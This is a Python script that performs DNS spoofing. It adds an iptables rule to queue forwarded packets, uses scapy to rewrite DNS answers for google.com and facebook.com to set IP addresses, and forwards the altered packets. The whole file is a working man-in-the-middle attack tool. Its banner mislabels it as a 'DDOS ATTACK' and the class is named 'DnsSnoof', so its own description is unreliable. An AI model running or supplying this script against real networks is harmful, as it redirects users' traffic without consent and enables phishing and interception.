#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 31 13:05:12 2022
"""

import os  # To interact with the operating system, such as clearing the terminal screen
import logging as log  # Logging library for logging messages to console
from scapy.all import IP, DNSRR, DNS, UDP, DNSQR  # Importing scapy functions for packet manipulation
from netfilterqueue import NetfilterQueue  # Importing NetfilterQueue to capture packets in a queue for processing

# Clear the terminal screen for better readability
os.system("clear")

# Print header for attack information
print ("\n----------------------------------------------------")
print ("\n---------      D D O S     A T T A C K     ---------")
print ("\n----------------------------------------------------\n")

# Define the DnsSnoof class that performs DNS spoofing
class DnsSnoof:
    # Constructor to initialize the host dictionary and queue number
    def __init__(self, hostDict, queueNum):
        self.hostDict = hostDict  # Dictionary that holds the spoofed domain names and corresponding IP addresses
        self.queueNum = queueNum  # Queue number to be used in netfilter
        self.queue = NetfilterQueue()  # Initialize the NetfilterQueue object

    # Main method to start the DNS spoofing
    def __call__(self):
        log.info("Snoofing....")  # Log that the spoofing process is starting
        os.system(f'iptables -I FORWARD -j NFQUEUE --queue-num {self.queueNum}')  # Add a rule to iptables to forward packets to the specified queue
        self.queue.bind(self.queueNum, self.callBack)  # Bind the queue to the callback method
        try:
            self.queue.run()  # Start processing the queue
        except KeyboardInterrupt:
            # If the user interrupts the process, flush the iptable rule to stop the attack
            os.system(f'iptables -D FORWARD -j NFQUEUE --queue-num {self.queueNum}')
            log.info("[!] iptable rule flushed")  # Log that the rule has been flushed

    # Callback function to handle the DNS packets
    def callBack(self, packet):
        # Convert the packet payload into a scapy packet
        scapyPacket = IP(packet.get_payload())
        
        # Check if the packet has a DNS Response (DNSRR)
        if scapyPacket.haslayer(DNSRR):
            try:
                log.info(f'[original] { scapyPacket[DNSRR].summary()}')  # Log the original DNS response
                
                # Extract the domain name being queried
                queryName = scapyPacket[DNSQR].qname

                # Check if the queried domain name is in our spoofed list (hostDict)
                if queryName in self.hostDict:
                    # If it's in the dictionary, modify the DNS response with our spoofed IP
                    scapyPacket[DNS].an = DNSRR(
                        rrname=queryName, rdata=self.hostDict[queryName]  # Spoof the IP
                    )
                    scapyPacket[DNS].ancount = 1  # Indicate that one answer is provided

                    # Remove the IP checksum and UDP checksum because we modified the packet
                    del scapyPacket[IP].len  # Remove IP length
                    del scapyPacket[IP].chksum  # Remove IP checksum
                    del scapyPacket[UDP].len  # Remove UDP length
                    del scapyPacket[UDP].chksum  # Remove UDP checksum
                    
                    log.info(f'[modified] {scapyPacket[DNSRR].summary()}')  # Log the modified DNS response
                else:
                    # If the queried domain is not in the spoofed list, log the original DNS response
                    log.info(f'[not modified] { scapyPacket[DNSRR].rdata }')
            except IndexError as error:
                log.error(error)  # Log any errors that may occur (e.g., invalid DNS response structure)

            # Set the modified packet as the payload and accept the packet to forward it
            packet.set_payload(bytes(scapyPacket))
        return packet.accept()  # Accept and forward the packet to the next stage

# Main program execution
if __name__ == '__main__':
    try:
        # Define the hostDict with the spoofed domain names and their corresponding fake IP addresses
        hostDict = {
            b"google.com.": "142.250.182.238",  # Spoof google.com to the IP address 142.250.182.238
            b"facebook.com.": "163.70.138.35"   # Spoof facebook.com to the IP address 163.70.138.35
        }
        queueNum = 0  # Set the queue number to use for netfilter queue

        # Configure logging settings (log timestamp and message at info level)
        log.basicConfig(format='%(asctime)s - %(message)s', level=log.INFO)
        
        # Create an instance of DnsSnoof with the spoofed domains and queue number
        snoof = DnsSnoof(hostDict, queueNum)

        # Start the DNS spoofing process
        snoof()
    except OSError as error:
        # Log any errors that occur, such as permission issues or invalid configurations
        log.error(error)
